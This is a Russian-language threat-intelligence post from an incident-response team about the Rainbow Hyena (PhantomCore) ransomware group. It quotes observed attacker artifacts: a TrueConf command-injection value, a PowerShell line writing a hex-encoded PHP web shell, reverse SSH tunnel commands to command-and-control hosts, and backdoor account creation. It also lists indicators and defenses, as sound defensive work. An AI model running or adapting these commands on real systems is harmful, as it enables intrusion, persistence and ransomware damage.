Всем привет, на связи команда DFIR JetCSIRT! Близится конец года, все готовят салаты и годовые отчеты. Мы тоже подводим итоги и заметили, что с одной из групп (или, по крайней мере, кластером злоумышленников) мы сталкивались чаще, чем с другими. Речь пойдёт о Rainbow Hyena — именно её активности мы посвящаем эту статью, разобрав несколько реальных кейсов.

Группа, известная как Rainbow Hyena (или PhantomCore), действует с 2022 года. Её атаки направлены на кражу данных и разрушение ИТ-инфраструктуры. Наряду с хактивистской мотивацией злоумышленники проявляют и финансовую заинтересованность, в частности, используют программы-вымогатели, основанные на исходных кодах Babuk и LockBit. Есть признаки связи с кластером Feral Wolf: совпадают TTPs и используемые инструменты.

Основной арсенал атакующих включает: LockBit, Babuk, Impacket, ADExplorer, Advanced IP Scanner, DumpIt.exe, memprocfs, Mimikatz, OpenSSH и другие утилиты.

Первый звоночек: начало года

В случае с Rainbow Hyena компании обычно обращались к нам уже после того, как данные были зашифрованы, а инфраструктура разрушена. Злоумышленники на тот момент уже переходили к следующей жертве, оставив записку с требованием выкупа за расшифровку.

Но были и счастливчики. Первый инцидент с этой группой произошел в начале года, когда центр мониторинга и реагирования Jet CSIRT зафиксировал подозрительную активность в инфраструктуре одного из заказчиков. Была обнаружена попытка кражи резервных доменных ключей (Data Protection API, DPAPI). DPAPI используется для шифрования паролей, сохранённых браузерами, закрытых ключей сертификатов и других конфиденциальных данных. Контроллеры домена хранят резервные главные ключи, которые можно использовать для расшифровки всех секретных данных, зашифрованных с помощью DPAPI на компьютерах в домене.

Оперативные меры реагирования позволили локализовать инцидент и обойтись без серьёзных последствий. На момент реагирования и расследования первого инцидента атрибутировать группу злоумышленников не удалось. Но с индикаторами с данного инцидента мы встретились еще не раз. Лишь после нескольких атак, в результате которых были зашифрованы данные разных компаний, мы поняли, какие последствия могли быть у того случая с DPAPI.

Тактики и техники Rainbow Hyena

1. Первоначальный доступ:

Злоумышленники применяют три основные техники первоначального доступа (MITRE ATT&CK):

  • T1190 – Exploit Public-Facing Application: эксплуатация уязвимостей сервисов, доступных из сети Интернет;

  • T1133 – External Remote Services: атаки, связанные с компрометацией сервисов для получения удаленного доступа к корпоративной сети (RDP, SSH, VPN…);

  • T1199 – Trusted Relationship: атак�� через подрядчиков с доступом в инфраструктуру.

В случае T1133 и T1199 мы наблюдали аномалии в паттернах удалённых подключений:

  • IP-адреса вне доверенных диапазонов

  • Подключения в нерабочее время

  • Несоответствие геолокации источника ожидаемым регионам

В случае Т1190 в ходе последних расследований мы установили, что злоумышленники перешли к активной эксплуатации уязвимости в сервисе для организации ВКС — TrueConf. Уязвимости присвоен идентификатор BDU:2025-10116: «Уязвимость TrueConf Server существует из-за непринятия мер по нейтрализации специальных элементов. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, выполнить произвольный код».
Уязвимость относительно свежая (август 2025г.) вероятно, еще будет какое-то время активно использоваться для получения первоначального доступа к корпоративным инфраструктурам. Стоит отметить что обновления для трех основных версий TrueConf Server, полностью исправляющие уязвимости, были выпущены до публикации публичной информации в БДУ ФСТЭК (версии TrueConf Server 5.5.1, 5.4.6 и 5.3.7).

Следы попыток её эксплуатации можно обнаружить:

1. В журналах TrueConf:

.\TrueConf\web_logs\log_2025-**.txt

[2025-**-**T17:29:18.612117+00:00] WebManager.INFO: TrueConf\WebManager\Classes\Server::generateRegistrationFile (server_id=a, server_name=aaa1111#vcs) [] []

[2025-**-**T17:29:18.612711+00:00] WebManager.INFO: Execute: "C:\Program Files\TrueConf Server\tc_server.exe/mode:1 /ServerID:a /ServerName:aaa1111#vcs /File:"C:\TrueConf\activation\offlinereg.vrg" [] []

[2025-**-**T17:42:36] WebManager.INFO: TrueConf\WebManager\Classes\Server::generateRegistrationFile (server_id=, server_name=xf1||powershell -c "sc -non -pat .1 -v ''"||#vcs) [] []

\TrueConf\web_logs\error2025-*.log: журнал ошибок также может содержать следы эксплуатации уязвимости

The filename, directory name, or volume label syntax is incorrect.

error: the required argument for option '--Serial' is missing

dir : Cannot find path 'C:\Program Files\TrueConf Server\httpconf\site\public\windows\' because it does not exist.

At line:1 char:1

+ dir c:windows\|sc ../private/css/c.css

2. В журналах PowerShell

2025-**-** 17:29:21, Event ID 600

Provider "Registry" is Started.

Details:

      ProviderName=Registry

      NewProviderState=Started

      SequenceNumber=1

      HostName=ConsoleHost

      HostVersion=5.1.17763.7786

      HostApplication=powershell -c ipconfig|sc ../private/css/c.css

2025-**-** 17:30:23, Event ID 400

Engine state is changed from None to Available.

Details:

      NewEngineState=Available

      PreviousEngineState=None

      SequenceNumber=13

      HostName=ConsoleHost

      HostVersion=5.1.17763.7786

      HostApplication=powershell -c ssh|sc ../private/css/c.css

В файл /Program Files/TrueConf Server/httpconf/site/private/css/c.css выводятся результаты выполненных команд злоумышленников;

3. При наличии мониторинга событий можно заметить подозрительные дочерние процессы (cmd.exe, powershell.exe) от имени процессов TrueConf (tc_webmgr.exe, tc_server.exe). В DFIR-кейсах, конечно же, расширенный аудит и события Event ID 4688 с командлайном — это роскошь для аналитиков, которая встречается крайне редко.

В результате эксплуатации уязвимости злоумышленники использовали возможность удаленно исполнить код и по частям загружали ВПО категории веб-шелл:

powershell -c ac -pat .1 -v '3c3f7068700a2069662028245f5345525645525b27524551554553545f4d4554484f44275d203d3d3d20275055542729207b2070617273655f7374722866696c655f6765745f636f6e74656e747328227068703a2f2f696e70757422292c20247075745f7661727329')

Из нескольких кусочков создается файл: «\Program Files\TrueConf Server\httpconf\site\public\index-api-deprecated.php», с которым в дальнейшем взаимодействуют злоумышленники

Кроме того, что не обновленная система TrueConf может стать точкой входа в инфраструктуру, она часто хранит чувствительные данные, например, аудио/видео-записи совещаний, конфиденциальную информацию о сотрудниках и клиентах компании. Возможно, стоит задуматься об ограничении и об аудите доступа к каталогам, которые хранят записи встреч (пример пути — «\TrueConf\Recordings»).

2. Развитие атаки:

Используя удобный интерфейс исполнения команд загруженного веб-шелла, злоумышленники развивали атаку: получали доступ к аутентификационным данным путем дампа оперативной памяти сервера с использованием:

  • DumpIt.exe — утилита для создания дампа оперативной памяти

  • memprocfs.exe — утилита для анализа дампов оперативной памяти

В случае с атаками через подрядчика зачастую скомпрометированные учетные данные имеют права локального администратора, этого более чем достаточно для развития атаки.

Далее следует этап внутренней разведки и изучения инфраструктуры. Злоумышленники перемещались внутри сети по RDP и SMB. В инцидентах фиксировались следы AdExplorer, Impacket, активно использовался PowerShell. Выполнялись типичные р��зведывательные команды на хостах:

  • whoami

  • quser

  • ping SRV-1

  • curl ifconfig.me

  • net share

  • get-adusers

Для повышения привилегий и кражи аутентификационных данных, помимо дампа оперативной памяти на узлах, злоумышленники проводили:

  • Дамп ветвей реестра операционной системы Windows;

  • Анализ содержимого доступных для чтения файлов (в том числе файлов 1CV8Clst.lst, которые содержат пароль доступа 1С в зашифрованном виде);

  • Атаки Kerberoasting;

  • Кражу локальной базы паролей Keepass;

  • Анализ файлов на хостах, содержащих пароли в открытом виде.

3. Сокрытие и маскировка:

В расследованных нами кейсах злоумышленники чаще действовали аккуратно и старались не создавать шума до последнего момента. Например, на скомпрометированных серверах создавались учетные записи, действия которых сливались с общим фоном легитимной активности:

  • net user USR1CV8 P@ssw0rd /add — маскировка под учетную запись 1С

  • net user audit1 P@ssw0rd /add - audit1 — маскировка под одну из служебных УЗ

Такие УЗ не вызывают мгновенных подозрений при беглом взгляде администратора, позволяя злоумышленнику закрепиться в системе.

Исполняемые файлы маскировались под важные легитимные компоненты инфраструктуры:

  • BrowserPlugin.exe — маскировка под имя плагина КриптоПро для работы с электронной подписью.

  • RedCheckAgentd.exe — имитация хостового агента сканера безопасности, чьё присутствие и сетевая активность считаются нормой.

4. Способ закрепления:

Злоумышленники использовали неочевидный инструмент и протокол для закрепления на Windows-узлах — SSH. Эта техника, а также использование одних и тех же управляющих серверов объединяют расследованные нами инциденты.

Следы создания reverse SSH-туннелей для скрытого доступа:

C:\Windows\System32\OpenSSH\ssh.exe -f -N -R 18412 -p443 qqiapiku@188.40.233[.]10

ssh  -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 14235 -p443 deyttnxvtycumnyqzwfonui134698@akselerator.1cbit[.]dev

С комбинацией ключей -f и -N злоумышленник может превратить локальный сервер в SOCKS Proxy для дальнейшего горизонтального перемещения внутри корпоративной сети или закрепления в ней. Также данное соединение позволяет использовать инструменты для атаки, например, Impacket. В целях закрепления на некоторых узлах были сохранены подобные команды в задачах планировщика.

5. Заключительная фаза атаки:

Изучив инфраструктуру и получив доступ к привилегированным УЗ, злоумышленники выбирали способ распространения шифровальщика. Для этого требуется доступ к средствам автоматизации, поэтому уже типичная схема выглядит следующим образом:

Windows-инфраструктура шифровалась путем постановки задач через сервер управления Kaspersky Security Center. Эту технику взяли на вооружение многие другие группы.

Именно поэтому убедительно рекомендуем озаботиться защитой СЗИ и средств автоматизации. А также ознакомиться и применить необходимые меры защиты, которые указал вендор в харденинг-гайде, например, здесь:

  • Настройка списка разрешенных IP-адресов для подключения к Серверу администрирования KSC;

  • Использование двухфакторной аутентификации;

  • Запрет на сохранение пароля администратора;

  • Регулярный аудит всех пользователей и их действий.

Шифрование виртуальных машин осуществлялось вручную путем доставки на хосты виртуализации файла вируса-шифровальщика Babyk (имя файла /tmp/systemd) и его запуска. На ESXI-хостах версии 8 и выше включен параметр execInstalledOnly, благодаря чему исполнение недоверенных файлов заблокировано. Однако на этом этапе атаки злоумышленники уже имеют доступ к привилегированной УЗ и могут легко отключить этот параметр. При отключении execInstalledOnly отображается предупреждение в веб-интерфейсах vCenter и ESXi, а также регистрируется событие в журналах hostd.log, vobd.log, vmkernel.log:

2025-**-**T10:16:46.686Z In (14) vobd[65773]: [UserWorldCorrelator] 20742319us: [vob.uw.exec.installonly.disabled]

ExecInstalledOnly has been disabled. This allows the execution of non-installed binaries on the host. Unknown content can cause malware attacks similar to Ransomware.

Запуск «недоверенной» программы также будет зафиксирован в журналах ESXI:

2025-**-**T00:37:05.319Z In(14) vobd[2097658]:  [UserWorldCorrelator] 36666240149115us: [vob.uw.exec.installonly.warning] Execution of non-installed file: /tmp/systemd

По итогу часть систем зашифрована на уровне ОС с помощью Lockbit, на уровне виртуализации — с помощью Babyk. Если злоумышленники находили бэкапы, то уничтожали их для нанесения максимального ущерба.

Другая часть систем зашифрована только на уровне виртуализации — с помощью Babyk, здесь в некоторых случаях удавалось извлечь критичные данные из поврежденной ВМ.

Рекомендации и индикаторы компрометации

Для повышения уровня защищённости от подобных инцидентов необходимо выполнить базовые рекомендации:

  • установить недостающие обновления (в данном случае TrueConf) и убрать лишние активы с внешнего периметра;

  • провести проактивный поиск угроз (Threat Hunting или Compromise Assesment);

  • провести харденинг: тренд на использование KSC в атаках не теряет актуальности, применение защитных мер, которые рекомендованы самим вендором, сильно усложнит жизнь злоумышленникам;

  • провести аудит доступа подрядчиков и настроить мониторинг: еще один тренд, который не теряет своей актуальности, это атака с использованием учётных записей подрядчиков. Доступ подрядчиков должен быть ограничен только необходимыми ресурсами, для подключения используется MFA.

Сетевые индикаторы компрометации:

IP-адрес

Описание

45.144.30[.]5

С2

Страна: Russian Federation
Провайдер: UFO Hosting LLC

217.60.2[.]97

С2

Страна: Latvia

Провайдер: CGI Global Limited

94.131.15[.]153

C2

Страна: Estonia
Провайдер: Weiss Hosting Group S.r.l.

23.184.48[.]215

Страна: United States of America
Провайдер: Incognet LLC.

146.70.204[.]184

VPN

Страна: United Kingdom of Great Britain and Northern Ireland
Провайдер: M247 Europe SRL

149.40.63[.]132

Страна: United Kingdom of Great Britain and Northern Ireland
Провайдер: DataCamp Limited

185.253.98[.]82

Страна: United Kingdom of Great Britain and Northern Ireland
Провайдер: M247 Europe SRL.

109.252.50[.]88

Страна: Russian Federation
Провайдер: PJSC Moscow City Telephone Network

2.20.33[.]159

Страна: Belgium
Провайдер: Akamai International BV

188.40.233[.]24

С2

Страна: Germany
Провайдер: ITNetconsult Inc

188.40.233[.]10

C2

Страна: Germany
Провайдер: ITNetconsult Inc

104.21.64[.]1

Страна: United States of America
Провайдер: CloudFlare Inc.

104.21.112[.]1

Страна: United States of America
Провайдер: CloudFlare Inc.

104.21.48[.]1

Страна: United States of America
Провайдер: CloudFlare Inc.

104.21.32[.]1

Страна: United States of America
Провайдер: CloudFlare Inc.

104.21.80[.]1

Страна: United States of America
Провайдер: CloudFlare Inc.

104.21.16[.]1

Страна: United States of America
Провайдер: CloudFlare Inc.

104.21.96[.]1

Страна: United States of America
Провайдер: CloudFlare Inc.

195.133.145[.]111

C2

Страна: Russian Federation
Провайдер: MT Finance LLC.

5.253.204[.]187

VPN

Страна: Luxembourg
Провайдер: M247 Europe SRL

130.195.245[.]5

VPN

Страна: Slovenia
Провайдер: M247 Europe SRL

146.70.55[.]230

VPN

Страна: Belgium
Провайдер: M247 Europe SRL

Домен

Описание

local.tomskneft[.]com

Дата создания: 2025-01-01 00:00:00

Дата истечения: 2026-01-01 00:00:00

Страна регистранта: Ukraine

akselerator.1cbit[.]dev

Дата создания: 2025-01-12T10:35:43Z

Дата истечения: 2026-01-12T10:35:43Z

Регистратор: Namecheap Inc.

Страна регистранта: Island

Hostname

Описание

BITTRIX

Данный hostname фиксировался в журналах операционной системы при удаленных подключениях злоумышленников

Файловые индикаторы компрометации:

Имя файла

SHA-256

MD5

Описание

BrowserPlugin.exe

RedCheckAgentd.exe

SSH.exe

62578d9bf1f2079968fb92352a535587e47c154b1556c31cb015a60109d0cf0b 

3981aadf77179aaa4a878affad9dbeff

Легитимное ПО SSH.exe

Deprecated.php

001d5cb61dc05a5821db85eae40142e1345ffb40c86bb46083fd0d1dbad3a7fb

c27828233a8c0756ffba98238511c815

Веб-шелл, загружаемый в результате эксплуатации уязвимости в TrueConf

MITRE ATT&CK:

Тактика

Техника

Описание

Initial access

T1133  External Remote Services

Злоумышленники используют службы удаленного доступа с возможностью внешнего подключения для получения первоначального доступа к сети и (или) закрепления в ней

Initial access

T1199  Trusted Relationship

Злоумышленники компрометируют УЗ подрядной организации, имеющей доступ к целевым системам

Initial access

T1190 Exploit Public-Facing Application

Злоумышленники эксплуатируют уязвимости систем, доступных из сети Интернет. Например, популярные уязвимости MS Exchange — ProxyLogon, ProxyShell

Initial access

T1078 Valid Accounts

Злоумышленники используют легитимные учетные данные для первоначального доступа, закрепления, повышения уровня привилегий или предотвращения обнаружения

Execution

T1059  Command and Scripting Interpreter

T1059. 001 PowerShell

T1059. 003 CMD

Злоумышленники активно используют интерпретаторы командной строки и сценариев для выполнения команд или запуска сценариев и исполняемых файлов

Persistence

T1136  Create Account

T1136.001 Local Accounts

T1136.002 Domain Accounts

Злоумышленники в ходе атак создают учетные записи для закрепления в инфраструктуре

Persistence

T1078  Valid Accounts

T1078.002 Domain Accounts

Злоумышленники используют скомпрометированные УЗ в ходе атаки

Privilege Escalation

T1078  Valid Accounts

T1078.002 Domain Accounts

T1078.003 Local Accounts

Злоумышленники для повышения привилегий используют скомпрометированные легитимные доменные и локальные учетные записи

 

Defense Evasion

T1036 Masquerading: Match Legitimate Resource Name or Location

Злоумышленники маскируют используемое ВПО под другие легитимные программы

Defense Evasion

T1562.001 Impair Defenses: Disable or Modify Tools

Злоумышленники отключают средства защиты, а также изменяют их настройки

 

Credential Access

T1003 OS Credential Dumping

T1003.001 LSASS Memory

Злоумышленники получают аутентификационные данные из памяти процесса LSASS.

Credential Access

T1552 Unsecured Credentials

T1552.001 Credentials In Files

Злоумышленники ищут аутентификационные данные в доступных файлах на скомпрометированных узлах

Credential Access

T1555.003 Credentials from Web Browsers

Злоумышленники проводят поиск сохраненных паролей в браузерах

Credential Access

T1555.005 Password Managers

Злоумышленники проводят поиск сохраненных паролей в парольных менеджерах

Discovery

T1046  Network Service Discovery

Злоумышленники проводят сканирование и поиск уязвимых ресурсов (Advanced IP Scanner, Advanced Port Scanner)

Discovery

T1087.001 Account Discovery:

Local Account

Злоумышленники собирают сведения о локальных и доменных группах используя команды whoami, net user, net group, Get-ADComputer

Discovery

T1087.002 Account Discovery:

Domain Account

Злоумышленники собирают сведения о локальных и доменных группах используя команды whoami, net user, net group, Get-ADComputer

Discovery

T1069.001 Permission Groups

Discovery: Local Groups

Злоумышленники собирают сведения о локальных и доменных группах используя команды whoami, net user, net group, Get-ADComputer

Discovery

T1069.001 Permission Groups

Discovery: Domain Groups

Злоумышленники собирают сведения о локальных и доменных группах используя команды whoami, net user, net group, Get-ADComputer

Discovery

T1018 Remote System Discovery

Злоумышленники получают список других систем по IP-адресу, имени хоста в сети

Discovery

T1083 File and Directory Discovery

Злоумышленники просматривают файлы и каталоги в скомпрометированных системах

Discovery

T1217 Browser Information Discovery

Злоумышленники просматривают информацию, которая хранится в браузерах, чтобы узнать больше о скомпрометированных средах, а также завладеть аутентификационными данными

Lateral Movement

T1021 Remote Services

T1021.001 RDP

T1021.002 SMB

T1021.004 SSH

Злоумышленники используют службы удаленного доступа и протоколы удаленного доступа для перемещения внутри инфраструктуры.

Lateral Movement

T1570 Lateral Tool Transfer

Злоумышленники передают инструменты или другие файлы между системами в скомпрометированных системах (например, SMB, RDP, PsExec)

Command and Control

T1219 Remote Access Tools

Злоумышленники используют стороннее ПО для обеспечения удаленного доступа и установления интерактивного канала управления и контроля в целевых системах

Command and Control

T1572 Protocol Tunneling                    

Злоумышленники для доступа к скомпрометированной системе используют туннели, построенные с использованием ssh

Impact

T1529 System Shutdown/Reboot

Злоумышленники могут выключать/перезагружать системы, чтобы ограничить доступ к этим системам, снизить шансы на восстановление паролей и перезатереть данные в оперативной памяти

Impact

T1486 Data Encrypted for Impact

Злоумышленники шифруют данные с целью получения выкупа

Авторы:

Артем Семагин, ведущий аналитик киберкриминалистики, «Инфосистемы Джет».
Валерия Шотт, ведущий аналитик, «Инфосистемы Джет».